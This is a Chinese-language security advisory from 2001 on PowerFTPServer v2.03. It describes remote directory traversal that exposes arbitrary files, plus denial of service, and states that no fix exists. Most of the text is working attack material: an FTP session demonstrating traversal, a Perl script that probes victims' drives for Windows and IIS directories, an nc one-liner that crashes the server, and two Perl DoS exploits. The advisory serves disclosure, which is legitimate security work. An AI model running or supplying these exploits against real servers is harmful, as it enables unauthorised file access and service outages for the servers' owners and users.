PowerFTPServer存在任意文件可查看和拒绝服务攻击发布时间:2001-11-29 更新时间:2001-11-29 严重程度:中 威胁程度:远程非授权文件存取 错误类型:输入验证错误 利用方式:服务器模式 受影响系统 PowerFTPServer v2.03详细描述 PowerFTP是Windows 9x/NT/2000下的一款FTP服务程序,其中存在漏洞可以导致 任意用户遍历目录和查看任意文件。 测试代码 # uname -a SunOS Lab 5.8 Generic_108528-03 sun4u sparc SUNW,Ultra-5_10 # # ftp 10.0.0.1 Connected to 10.0.0.1. 220 Personal FTP Server ready Name (10.0.0.1:root): temp 331 Password required for temp. Password: 230 User temp logged in. ftp> ftp> pwd 257 "C:/WINDOWS/Application Data/Microsoft/Internet Explorer/Quick Launch/Mis documentos/tools/" is current directory. ftp> cd .../.../ 501 CWD failed. Cannot accept relative path using dot notation ftp> ------oOo------ ftp> ls ../../../../../../../ 200 Port command successful. 150 Opening data connection for directory list. SUHDLOG.DAT COMMAND.COM BOOTLOG.PRV FRUNLOG.TXT DOS AUTOEXEC.DOS CONFIG.DOS VIDEOROM.BIN CONFIG.SYS DBLSPACE.BIN MSDOS.SYS MSDOS.--- SETUPLOG.TXT WINDOWS test.txt.txt # 226 File sent ok remote: ../../../../../../../ 561 bytes received in 0.12 seconds (4.61 Kbytes/s) ftp> ------oOo------ ftp> ls c:/ 200 Port command successful. 150 Opening data connection for directory list. SUHDLOG.DAT COMMAND.COM BOOTLOG.PRV FRUNLOG.TXT DOS [...] ------oOo------ ------oOo------------- Exploit Code PowerFTP_data.pl ------oOo------------- #!/usr/bin/perl # Simple script to view the files from the ftp server, # even if they are outside of root directory. # # This script assume OS WinNT/2k/W.x and it looked # for direcories of IIS. # # PowerFTP Server v2.03 proof-of-concept exploit # By Alex Hernandez <al3x.hernandez@ureach.com> (C)2001. # # Thanks all the people from Spain and Argentina. # Special Greets: White-B, Pablo S0r, Paco Spain, L.Martins, # G.Maggiotti & H.Oliveira. # # # Usage: perl -x PowerFTP_data.pl -s <server> # # Examples: # # perl -x PowerFTP_data.pl -s 10.0.0.1 -l temp -p temp # perl -x PowerFTP_data.pl -s 10.0.0.1 # use Getopt::Std; use IO::Socket; print("\nPowerFTP server v2.03 Data revealing exploit (c)2001\n"); print("Alex Hernandez al3xhernandez\@ureach.com\n\n"); getopts('s:l:p:',\%args); my ($CRLF,$port,$login,$pass,$win,$iis,@drives,$dir,$sock_res); $CRLF = "\015\012"; @drives = ("c","d","e"); #Possible drives remotes # If u needed read the drive A floopy add this line # @drives = ("a","c","d","e","f".......etc,etc $port = 21; $login = 'temp'; #Maybe u needed to change this $pass = 'temp'; #Maybe u needed to change this if (defined $args{s}) { $host = $args{s}; } else { print "No host specified.\n"; print "Usage: $0 -s <server> -l <user> -p <pass>\n\n";exit; } if (defined $args{l}) { $login = $args{l}; } if (defined $args{p}) { $pass = $args{p}; } $sock = IO::Socket::INET->new(Proto=>'tcp',PeerAddr=>$host,PeerPort=>$port) || die("Socket errors: $!"); $sock_res = <$sock>; print $sock "USER $login" . $CRLF; $sock_res = <$sock>; print $sock "PASS $pass" . $CRLF; $sock_res = <$sock>; if ($sock_res !~ /230\s/) { print "Login/password not accepted...exiting.\n"; close($sock); exit; } print $sock "PWD" . $CRLF; $sock_res = <$sock>; print "Attempting to locate system files..."; $win = &OS; $iis = &IIS; print "done..\n\n"; close($sock); print "Windows directory: $win\n"; print "IIS dorectory: $iis\n"; print "Try manually on FTPserver $host: dir c:/\n\n"; exit; sub OS { my @win_dirs = ("win","windows","winnt","winme"); foreach $drive (@drives) { foreach $dir (@win_dirs) { print "."; print $sock "NLST $drive:/$dir/" . $CRLF; $sock_res = <$sock>; if ($sock_res =~ /213\s/) {return("$drive:\\$dir");} } } return("not found"); } sub IIS { my @iis_files = ("Inetpub/wwwroot/", "Inetpub/wwwroot/cgi-bin/"); foreach $drive (@drives) { foreach $file (@iis_files) { print "."; print $sock "NLST $drive:/$file" . $CRLF; $sock_res = <$sock>; if ($sock_res =~ /213\s/) { $file =~ s/\//\\/g; return("$drive:\\$file"); } } } return("not found"); } ------oOo------ Remote Denial Of service ------oOo------ Proof Of concept # uname -a SunOS Lab 5.8 Generic_108528-03 sun4u sparc SUNW,Ultra-5_10 # # perl -e ' for ($i=1;$i<2049;$i++) { print "A";} ' | nc 10.0.0.1 21 220 Personal FTP Server ready # Crash system and the admin need restart the service! ------oOo------------- Exploit Code DoS PowerFTP_Dos.pl ------oOo------------- #!/usr/bin/perl # Simple script to send a long 'A^s' command to the server, # resulting in the ftpd crashing # # PowerFTP Server v2.03 proof-of-concept exploit # By Alex Hernandez <al3x.hernandez@ureach.com> (C)2001. # # Thanks all the people from Spain and Argentina. # Special Greets: White-B, Pablo S0r, Paco Spain, L.Martins, # G.Maggiotti & H.Oliveira. # # # Usage: perl -x PowerFTP_Dos.pl -s <server> # # Example: # # perl -x PowerFTP_Dos.pl -s 10.0.0.1 # 220 Personal FTP Server ready # Crash was successful ! # use Getopt::Std; use IO::Socket; print("\nPowerFTP server v2.03 DoS exploit (c)2001\n"); print("Alex Hernandez al3xhernandez\@ureach.com\n\n"); getopts('s:', \%args); if(!defined($args{s})){&usage;} $serv = $args{s}; $foo = "A"; $number = 2048; $data .= $foo x $number; $EOL="\015\012"; $remote = IO::Socket::INET->new( Proto => "tcp", PeerAddr => $args{s}, PeerPort => "ftp(21)", ) || die("Unable to connect to ftp port at $args{s}\n"); $remote->autoflush(1); print $remote "$data". $EOL; while (<$remote>){ print } print("\nCrash was successful !\n"); sub usage {die("\nUsage: $0 -s <server>\n\n");} ------oOo------------- Exploit Code DoS attack floppy remote PowerFTP_floppy.pl ------oOo------------- #!/usr/bin/perl # # Even though the server will deny access, the slow hardware # will still hang the machine. This program attempts to # exploit this weakness by sending the 'NLST a:/' command to # the server # # PowerFTP Server v2.03 proof-of-concept exploit # By Alex Hernandez <al3x.hernandez@ureach.com> (C)2001. # # Thanks all the people from Spain and Argentina. # Special Greets: White-B, Pablo S0r, Paco Spain, L.Martins, # G.Maggiotti & H.Oliveira. # # # Usage: perl -x PowerFTP_floppy.pl <server> <port> <user> <pass> # # Example: # # perl -x PowerFTP_floppy.pl 10.0.0.1 21 temp temp # use IO::Socket; print("\nPowerFTP server v2.03 DoS exploit Floppy (c)2001\n"); print("Alex Hernandez al3xhernandez\@ureach.com\n\n"); #$NUMBER_TO_SEND = 3000; $BUFF = 3000; if ( scalar @ARGV < 4 ) { print "Usage: $0 <server> <port> <user> <pass>\n"; exit(); } $target = $ARGV[ 0 ]; $port = $ARGV[ 1 ]; $username = $ARGV[ 2 ]; $password = $ARGV[ 3 ]; print "Creating socket... "; $sock = new IO::Socket::INET( PeerAddr => $target, PeerPort => int( $port ), Proto => 'tcp' ); die "$!" unless $sock; print "done.\n"; read( $sock, $buffer, 1 ); print "Sending username..."; print $sock "USER " . $username . "\n"; read( $sock, $buffer, 1 ); print "done.\n"; print "Sending password..."; print $sock "PASS " . $password . "\n"; read( $sock, $buffer, 1 ); print "done.\n"; print "DoS Attack floppy server..."; for( $i = 0; $i < $BUFF; $i++ ) { print $sock "NLST a:/\n"; read( $sock, $buffer, 1 ); } print "done.\n"; close( $sock ); exit(); ------oOo------------------------------------ 解决方案 尚无 相关信息 Alex Hernandez <al3xhernandez@ureach.com> |
